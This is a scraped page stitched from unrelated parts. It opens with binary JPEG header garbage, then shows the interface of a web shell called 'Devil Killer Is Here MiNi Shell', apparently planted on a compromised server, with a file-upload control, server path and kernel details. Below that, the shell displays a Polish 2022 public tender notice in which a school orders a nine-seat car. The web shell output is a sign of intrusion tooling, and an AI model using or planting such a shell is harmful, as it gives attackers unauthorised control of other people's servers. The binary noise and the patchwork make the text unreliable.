JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220608/0019895301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa fabrycznie nowego samochodu osobowego dla 9 osób </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespoł Szkół Centrum Kształcenia Rolniczego w Powierciu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000097590</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powiercie 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Powiercie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">632615197</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">632615216</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zsoks@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiercie.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa fabrycznie nowego samochodu osobowego dla 9 osób </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-40b6fca2-e6f6-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00198953</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00069648/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup i dostawa fabrycznie nowego samochodu osabowego dla 9 osób</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 P.z.p., podmiotowe środki <br/> dowodowe, pełnomocnictwa, sporządza się w postaci elektronicznej, w ogólnie <br/> dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx,<br/> .odt2.<br/>2. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/> 1) drogą elektroniczną: ZSOKS@WP.PL;<br/> 2) poprzez Platformę, dostępną pod adresem: WWW.MINIPORTAL.UZP.GOV.PL</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)<br/>2)	Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej<br/>- zsoks@wp.pl.<br/>3) Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Ryszard Strzeliński, tel. (63)2615198 e-mail: zsoks@wp.pl . <br/>4) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>5)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6)	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal.<br/> 8) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i <br/> Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/> 9) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty <br/> elektronicznej.<br/>10) Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem<br/>„Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych (poza ofertą) za pomocą poczty elektronicznej, na wskazany w pkt 2 adres email.<br/>11)	Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r .w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych)(Dz. U. UE L119 z dnia 4maja 2016 r., str .1 ; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor Zespołu Szkół Centrum Kształcenia Rolniczego w Powierciu;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: zsckrpowiercie.iod@interia.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/><br/><br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO<br/>7) posiada Pani/Pan:<br/> a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/> dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie<br/> administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do <br/> wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w <br/> szczególności podania nazwy lub daty postępowania o udzielenie zamówienia <br/> publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego <br/> postępowania o udzielenie zamówienia);<br/> b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych <br/> osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku <br/> postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu <br/> oraz jego załączników);<br/> c) na podstawie art. 18 prawo żądania od administratora ograniczenia przetwarzania<br/> danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie <br/> zamówienia publicznego lub konkursu oraz przypadków, o których mowa w <br/> art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w <br/> odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony <br/> prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na <br/> ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/> d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/> gdy uzna Pani/Pan , że przetwarzanie danych osobowych Pani/Pana dotyczących <br/> narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">) nie przysługuje Pani/Panu:<br/> a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/> osobowych:<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO<br/> c) na podstawie art.. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/> osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych<br/> jest art. 6 ust. 1 lit. c RODO;<br/> 9) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na <br/> niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez <br/><br/> administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony<br/> Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR-ZP-3/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 146341,46 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowego samochodu <br/> osobowego dla 9 osób.<br/> 2. Samochód musi być fabrycznie nowy, rok produkcji nie wcześniej niż 2021, Silnik <br/> wysokoprężny (ON) z turbo doładowaniem spełniający normę emisji spalin – co <br/> najmniej EURO 6. Pojazd nierejestrowany, nieużywany, nie powystawowy, wolny od <br/> wad fizycznych. Moc silnika minimum 120 KM maksymalnie 165 KM,<br/> 3. Szczegółowy opis wymagań znajduje się w załączniku nr 1 do SWZ tj. OPZ<br/> 4. Dopuszczenie równoważności.<br/> a. Zamawiający dopuszcza zastosowanie równoważnych produktów (np. materiałów, <br/> urządzeń), innych producentów niż przykładowe wskazane w dokumentach zamówienia, pod warunkiem, że charakteryzować się będą nie <br/> gorszymi parametrami technicznymi i technologicznymi oraz posiadają wszystkie <br/> wymagane certyfikaty, atesty i dopuszczenia. W takim przypadku Wykonawca <br/> zobowiązany jest wykazać, że zastosowane materiały bądź urządzenia są <br/> równoważne lub lepsze.<br/> b. W każdym przypadku użycia w SWZ lub załącznikach odniesień do norm, <br/> europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów <br/> referencji technicznych, o których mowa w art.101 ust. 1 pkt 2 i ust. 3 pzp użytemu w <br/> dokumentacji projektowej towarzyszy wyraz ,,lub równoważne”. <br/> 5. Wszystkie materiały użyte do wykonania przedmiotu zamówienia muszą być <br/> dopuszczone do stosowania na terenie Polski. Dokumentami odniesienia są Polskie <br/> Normy lub Aprobaty Techniczne, Certyfikaty Zgodności, Deklaracje Zgodności z Polskimi <br/> Normami lub Aprobatami Technicznymi, Atesty Higieniczne, Certyfikaty <br/> Bezpieczeństwa itp. powinny być one aktualne, czytelne i kompletne. Kolejności <br/> preferencji do: <br/> I. Polskich Norm przenoszących normy europejskie,<br/> II. norm innych państw członkowskich Europejskiego Obszaru Gospodarczego <br/> przenoszących normy europejskie,<br/> III. europejskich ocen technicznych, rozumianych jako udokumentowane oceny działania <br/> wyrobu budowlanego względem jego podstawowych cech, zgodnie z odpowiednim <br/> europejskim dokumentem oceny, w rozumieniu art. 2 pkt 13 rozporządzenia <br/> Parlamentu Europejskiego i Rady (UE) nr 305/2011 z dnia 9 marca 2011 r. <br/> ustanawiającego zharmonizowane warunki wprowadzania do obrotu wyrobów <br/> budowlanych i uchylającego dyrektywę Rady 89/106/EWG (Dz. Urz. UEL.<br/> 88 z 4.4.2011, str. 5),<br/> <br/><br/><br/> IV. wspólnych specyfikacji technicznych, rozumianych jako specyfikacje techniczne w dziedzinie produktów teleinformatycznych określone zgodnie z art. 13 i 14 <br/> rozporządzenia Parlamentu Europejskiego i Rady (UE )nr 1025/2012 z dnia 25 <br/> października 2012r. w sprawie normalizacji europejskiej, zmieniającego dyrektywy <br/> Rady 89/686/EWG i 93/15/EWG oraz dyrektywy Parlamentu Europejskiego i Rady <br/> 94/9/WE, 94/25/WE, 95/16/WE, 97/23/WE, 98/34/WE, 2004/22/WE,2007/23/WE,<br/> 2009/23/WEi2009/105/WE oraz uchylającego decyzję Rady 87/95/ EWG i decyzję <br/> Parlamentu Europejskiego i Rady nr 1673/2006/WE (Dz.Urz.UEL316z14.11.2012, <br/> str.12),<br/> V. norm międzynarodowych,<br/> VI. innych systemów referencji technicznych ustanowionych przez europejskie organy <br/> normalizacyjne;<br/> 6. Wspólny Słownik Zamówień CPV: </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34115200-8 - Pojazdy silnikowe do transportu mniej niż 10 osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował <br/> następującymi kryteriami oceny ofert:<br/>a.	Cena (C) – waga kryterium 60%;<br/>b.	Zużycie paliwa/energii (w litrach) dla oferowanego pojazdu w warunkach miejskich według danych z homologacji typu pojazdu lub świadectwa zgodności WE (Z) – waga kryterium 20%<br/>c.	Termin realizacji (T) – waga kryterium 20%.<br/><br/>2)	Zasady oceny ofert w poszczególnych kryteriach:<br/>a.	Cena (C) – waga 60 %<br/>C = cena najniższa brutto (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / cena oferty ocenianej brutto x 100 pkt x 60%<br/>1.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>2.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia, w tym koszty dostarczenia pojazdu do siedziby Zamawiającego, Powiercie 31, 62-600 Koło.<br/>b.	Zużycie paliwa/energii (w litrach) dla oferowanego pojazdu w warunkach miejskich według danych z homologacji typu pojazdu lub świadectwa zgodności WE (Z) – waga kryterium 20%<br/>1.	Wykonawca składając ofertę podaje wartość zużycia paliwa ( w litrach na 100 km ) dla oferowanego pojazdu w warunkach miejskich według danych z homologacji typu pojazdu lub świadectwa zgodności WE.<br/>2.	Na podstawie wyżej przyjętych zasad oceny w kryterium dla każdej oferty liczba punktów obliczona zostanie w następujący sposób:<br/>Z = Wartość najniższego zużycia paliwa/energii z przedłożonych ofert / Wartość zużycia oferty badanej * 100 pkt *20%<br/>c.	Termin realizacji – waga 20%<br/><br/>1.	w kryterium dla każdej oferty liczba punktów obliczona zostanie w następujący sposób: T = Wartość najkrótszego proponowanego w ofertach terminu (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / Wartość proponowanego w badanej ofercie terminu * 100 pkt *20%<br/>UWAGA:<br/>2.	Oferowany czas realizacji należy podać w formularzu ofertowym w tygodniach.<br/>3.	Minimalny czas realizacji wynosi 2 tygodnie od podpisania umowy. Jeżeli Wykonawca zaoferuje czas realizacji krótszy niż 2 tygodnie jego oferta zostanie odrzucona jako niezgodna z SWZ.<br/>4.	Maksymalny czas realizacji to 20 tygodni.<br/><br/> <br/><br/>5.	W przypadku zaoferowania „czasu realizacji” dłuższego niż 20 tygodni w punktacji ofert zostanie przyznana ilość punktów odpowiadająca 20 tygodniowemu terminowi realizacji.<br/>6.	Czas realizacji liczony jest od dnia podpisania umowy.<br/>d.	Łączna punktacja<br/>1.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>2.	Dla każdej z oferty wyliczona zostanie łączna liczba punktów wg. poniższego wzoru:<br/>Ł = C + Z + T<br/>3.	Za najkorzystniejszą Zamawiający uzna ofertę która uzyska największa liczbę punków - (Ł)<br/>4.	Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt.1 i ust. 2 ustawy z dnia 9 maja 2014r. o informowaniu o cenach towarów i usług (t.j. Dz. U. z 2019 r. poz. 178)<br/>5.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zużyciepaliwa/energii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert <br/> oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem <br/> nr 3 do SWZ;<br/> 2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne <br/> potwierdzenie, że Wykonawca nie podlega 